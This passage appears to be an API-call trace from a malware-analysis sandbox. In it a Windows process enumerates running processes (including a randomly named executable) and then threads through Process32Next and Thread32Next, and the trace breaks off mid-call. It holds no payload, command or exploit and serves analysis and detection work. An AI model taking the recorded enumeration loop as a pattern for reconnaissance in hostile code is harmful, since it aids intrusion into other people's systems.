GetTickCount () returned 0x1139a0e [0230.410] GetCurrentThreadId () returned 0x314 [0230.410] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.410] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.410] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.412] GetTickCount () returned 0x1139a0e [0230.412] GetCurrentThreadId () returned 0x314 [0230.412] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.412] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.412] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x264, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.413] GetTickCount () returned 0x1139a0e [0230.413] GetCurrentThreadId () returned 0x314 [0230.413] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.413] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0230.414] GetTickCount () returned 0x1139a0e [0230.415] GetCurrentThreadId () returned 0x314 [0230.415] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.415] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.415] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0230.416] GetTickCount () returned 0x1139a1e [0230.416] GetCurrentThreadId () returned 0x314 [0230.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.416] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0230.417] GetTickCount () returned 0x1139a1e [0230.417] GetCurrentThreadId () returned 0x314 [0230.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.418] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x470, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.419] GetTickCount () returned 0x1139a1e [0230.419] GetCurrentThreadId () returned 0x314 [0230.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.419] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0230.420] GetTickCount () returned 0x1139a1e [0230.420] GetCurrentThreadId () returned 0x314 [0230.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.421] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.422] GetTickCount () returned 0x1139a1e [0230.422] GetCurrentThreadId () returned 0x314 [0230.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.422] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x498, pcPriClassBase=13, dwFlags=0x0, szExeFile="h1rxxmJek7fnkHTT.exe")) returned 1 [0230.423] GetTickCount () returned 0x1139a1e [0230.423] GetCurrentThreadId () returned 0x314 [0230.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.424] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x564, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0230.425] GetTickCount () returned 0x1139a1e [0230.425] GetCurrentThreadId () returned 0x314 [0230.425] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.425] Process32Next (in: hSnapshot=0x650, lppe=0x3adf258 | out: lppe=0x3adf258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x564, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0230.426] GetTickCount () returned 0x1139a1e [0230.426] Thread32First (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.427] GetCurrentThreadId () returned 0x314 [0230.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.427] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.427] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.429] GetTickCount () returned 0x1139a1e [0230.429] GetCurrentThreadId () returned 0x314 [0230.429] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.429] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.429] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.430] GetTickCount () returned 0x1139a1e [0230.430] GetCurrentThreadId () returned 0x314 [0230.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.430] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.432] GetTickCount () returned 0x1139a2d [0230.432] GetCurrentThreadId () returned 0x314 [0230.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.432] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.433] GetTickCount () returned 0x1139a2d [0230.433] GetCurrentThreadId () returned 0x314 [0230.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.433] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.434] GetTickCount () returned 0x1139a2d [0230.434] GetCurrentThreadId () returned 0x314 [0230.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.434] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.436] GetTickCount () returned 0x1139a2d [0230.436] GetCurrentThreadId () returned 0x314 [0230.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.436] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.437] GetTickCount () returned 0x1139a2d [0230.437] GetCurrentThreadId () returned 0x314 [0230.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.437] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.438] GetTickCount () returned 0x1139a2d [0230.438] GetCurrentThreadId () returned 0x314 [0230.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.439] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.440] GetTickCount () returned 0x1139a2d [0230.440] GetCurrentThreadId () returned 0x314 [0230.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.440] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.441] GetTickCount () returned 0x1139a2d [0230.441] GetCurrentThreadId () returned 0x314 [0230.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.441] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.442] GetTickCount () returned 0x1139a2d [0230.443] GetCurrentThreadId () returned 0x314 [0230.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.443] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.444] GetTickCount () returned 0x1139a2d [0230.444] GetCurrentThreadId () returned 0x314 [0230.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.444] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.445] GetTickCount () returned 0x1139a2d [0230.445] GetCurrentThreadId () returned 0x314 [0230.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.446] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.447] GetTickCount () returned 0x1139a3d [0230.447] GetCurrentThreadId () returned 0x314 [0230.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.447] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.448] GetTickCount () returned 0x1139a3d [0230.448] GetCurrentThreadId () returned 0x314 [0230.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.448] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.450] GetTickCount () returned 0x1139a3d [0230.450] GetCurrentThreadId () returned 0x314 [0230.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.450] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.451] GetTickCount () returned 0x1139a3d [0230.451] GetCurrentThreadId () returned 0x314 [0230.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.451] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.452] GetTickCount () returned 0x1139a3d [0230.452] GetCurrentThreadId () returned 0x314 [0230.452] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.452] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.454] GetTickCount () returned 0x1139a3d [0230.454] GetCurrentThreadId () returned 0x314 [0230.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.454] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.455] GetTickCount () returned 0x1139a3d [0230.455] GetCurrentThreadId () returned 0x314 [0230.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.455] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.455] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.456] GetTickCount () returned 0x1139a3d [0230.456] GetCurrentThreadId () returned 0x314 [0230.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.457] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.458] GetTickCount () returned 0x1139a3d [0230.458] GetCurrentThreadId () returned 0x314 [0230.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.458] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.459] GetTickCount () returned 0x1139a3d [0230.459] GetCurrentThreadId () returned 0x314 [0230.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.459] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.460] GetTickCount () returned 0x1139a3d [0230.461] GetCurrentThreadId () returned 0x314 [0230.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.461] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.462] GetTickCount () returned 0x1139a4d [0230.462] GetCurrentThreadId () returned 0x314 [0230.462] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.462] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.462] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.463] GetTickCount () returned 0x1139a4d [0230.463] GetCurrentThreadId () returned 0x314 [0230.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.464] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.465] GetTickCount () returned 0x1139a4d [0230.465] GetCurrentThreadId () returned 0x314 [0230.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.465] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.466] GetTickCount () returned 0x1139a4d [0230.466] GetCurrentThreadId () returned 0x314 [0230.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.466] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.467] GetTickCount () returned 0x1139a4d [0230.467] GetCurrentThreadId () returned 0x314 [0230.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.468] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.468] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.469] GetTickCount () returned 0x1139a4d [0230.469] GetCurrentThreadId () returned 0x314 [0230.469] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.469] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.470] GetTickCount () returned 0x1139a4d [0230.470] GetCurrentThreadId () returned 0x314 [0230.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.470] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.472] GetTickCount () returned 0x1139a4d [0230.472] GetCurrentThreadId () returned 0x314 [0230.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.472] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.473] GetTickCount () returned 0x1139a4d [0230.473] GetCurrentThreadId () returned 0x314 [0230.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.473] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.474] GetTickCount () returned 0x1139a4d [0230.474] GetCurrentThreadId () returned 0x314 [0230.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.474] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.476] GetTickCount () returned 0x1139a4d [0230.476] GetCurrentThreadId () returned 0x314 [0230.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.476] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.477] GetTickCount () returned 0x1139a4d [0230.477] GetCurrentThreadId () returned 0x314 [0230.478] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.478] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.478] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.479] GetTickCount () returned 0x1139a5c [0230.479] GetCurrentThreadId () returned 0x314 [0230.479] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.479] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.479] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.480] GetTickCount () returned 0x1139a5c [0230.480] GetCurrentThreadId () returned 0x314 [0230.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.480] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.480] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.482] GetTickCount () returned 0x1139a5c [0230.482] GetCurrentThreadId () returned 0x314 [0230.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.482] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.483] GetTickCount () returned 0x1139a5c [0230.483] GetCurrentThreadId () returned 0x314 [0230.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.483] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.484] GetTickCount () returned 0x1139a5c [0230.484] GetCurrentThreadId () returned 0x314 [0230.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.485] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.486] GetTickCount () returned 0x1139a5c [0230.486] GetCurrentThreadId () returned 0x314 [0230.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.486] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.487] GetTickCount () returned 0x1139a5c [0230.487] GetCurrentThreadId () returned 0x314 [0230.487] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.488] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.489] GetTickCount () returned 0x1139a5c [0230.489] GetCurrentThreadId () returned 0x314 [0230.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.489] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.490] GetTickCount () returned 0x1139a5c [0230.490] GetCurrentThreadId () returned 0x314 [0230.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.490] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.491] GetTickCount () returned 0x1139a5c [0230.491] GetCurrentThreadId () returned 0x314 [0230.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.492] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.493] GetTickCount () returned 0x1139a6c [0230.493] GetCurrentThreadId () returned 0x314 [0230.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.493] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.494] GetTickCount () returned 0x1139a6c [0230.494] GetCurrentThreadId () returned 0x314 [0230.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.494] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.496] GetTickCount () returned 0x1139a6c [0230.496] GetCurrentThreadId () returned 0x314 [0230.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.496] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.497] GetTickCount () returned 0x1139a6c [0230.497] GetCurrentThreadId () returned 0x314 [0230.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.497] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.498] GetTickCount () returned 0x1139a6c [0230.498] GetCurrentThreadId () returned 0x314 [0230.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.499] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.500] GetTickCount () returned 0x1139a6c [0230.500] GetCurrentThreadId () returned 0x314 [0230.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.500] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.501] GetTickCount () returned 0x1139a6c [0230.501] GetCurrentThreadId () returned 0x314 [0230.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.501] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.502] GetTickCount () returned 0x1139a6c [0230.502] GetCurrentThreadId () returned 0x314 [0230.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.503] HeapFree (in: hHeap=0x630000, 